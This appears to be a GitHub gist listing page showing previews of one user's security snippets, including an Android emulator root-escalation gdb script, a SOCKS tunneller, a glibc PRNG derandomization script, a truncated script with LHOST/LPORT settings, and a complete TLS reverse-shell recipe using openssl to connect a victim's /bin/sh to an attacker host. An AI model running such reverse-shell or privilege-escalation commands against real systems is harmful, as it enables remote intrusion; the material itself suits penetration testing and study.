Skip to content

Instantly share code, notes, and snippets.

View gteissier's full-sized avatar
🎱
Focusing

guillaume teissier gteissier

🎱
Focusing
View GitHub Profile
@gteissier
gteissier / root-my-emulator.py
Created June 3, 2020 13:23
gdb Python script that adds root-single command to elevate a process given by the name of its executable
import gdb
import re
from collections import namedtuple
DETAILS = {
# API 24 playstore
# API 25 playstore
'3.10.0+': (0xC0887D20, 0xC092138C, 316, 0xC0A7754C, 4),
# API 26 playstore
@gteissier
gteissier / socks2sapni.py
Created December 31, 2019 16:01
SOCKSv5 server to SAPNI tunneller: you can use proxy chains to tunnelize your favorite tools now
#!/usr/bin/env python3
import logging
import select
import socket
import struct
from socketserver import ThreadingMixIn, TCPServer, StreamRequestHandler
logging.basicConfig(level=logging.DEBUG)
SOCKS_VERSION = 5
@gteissier
gteissier / tcpdump.py
Created December 14, 2019 15:19
Pythonic tcpdump: copy, paste, and enjoy
#!/usr/bin/env python
'''
It has been tested with either py2 or py3.
Beware ancient versions of Linux kernel which may not support SOCK_NONBLOCK
or the memory mapped ring buffer.
BPF filter listed below is compiled form of "not port 22"
if you want to change it, do something like
@gteissier
gteissier / compute-internal-state.py
Created September 4, 2019 11:50
glibc derandomization
#!/usr/bin/env python
import z3
import sys
# glibc default PRNG
# it is called TYPE_3, and is an additive recursive generator
# its internal state is made of 31 32-bits integers
# r_0 ... r_30
# each call to random will modify the internal state
@gteissier
gteissier / pygrep.py
Created May 10, 2019 09:29
Look for FLAG[0-9a-zA-Z/+=]+ pattern everywhere, even in jar contained in zip contained in ear
#!/usr/bin/env python
import os
import re
import zipfile
from cStringIO import StringIO
def process_file(f):
data = f.read()
for m in re.finditer(r'(FLAG[0-9a-zA-Z/+=]+)', data):
#!/usr/bin/env python
import requests
import sys
from base64 import b64encode
LHOST = '172.16.89.1'
LPORT = 8888
@gteissier
gteissier / asciinema_rebase.py
Created April 29, 2019 04:19
Asciinema now stores timestamp from the start of the capture. To skip start of the capture, one needs to offset the timestamps from the first kept in the capture.
#!/usr/bin/env python
import sys
import json
start_time = None
for line in sys.stdin.readlines():
o = json.loads(line)
if type(o) != type([]):
@gteissier
gteissier / mass-webshot.py
Created April 26, 2019 07:28
Take web screenshots
#!/usr/bin/env python
from selenium import webdriver
import selenium
import sys
import re
def take_screenshot(url, png):
options = webdriver.ChromeOptions()
options.add_argument('headless')
@gteissier
gteissier / ber.py
Last active April 29, 2021 15:56
ASN.1 BER decoder
from cStringIO import StringIO
from struct import pack
from binascii import unhexlify, hexlify
from itertools import count, dropwhile
VERBOSE = True
class Asn1Obj:
'''generic frame for ASN1 fields, supports nesting'''
def __init__(self, klass, constructed, type, indefinite, value=None, children=[], absorbed=None):
@gteissier
gteissier / cmd.sh
Last active April 9, 2024 09:46
TLS reverse shell
# attacker side: create auto-signed certificate and setup a listener
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port 443
# victim side: connect back to attacker using TLS
mkfifo fifo; /bin/sh -i < fifo 2>&1 | openssl s_client -quiet -connect attacker:443 > fifo; rm fifo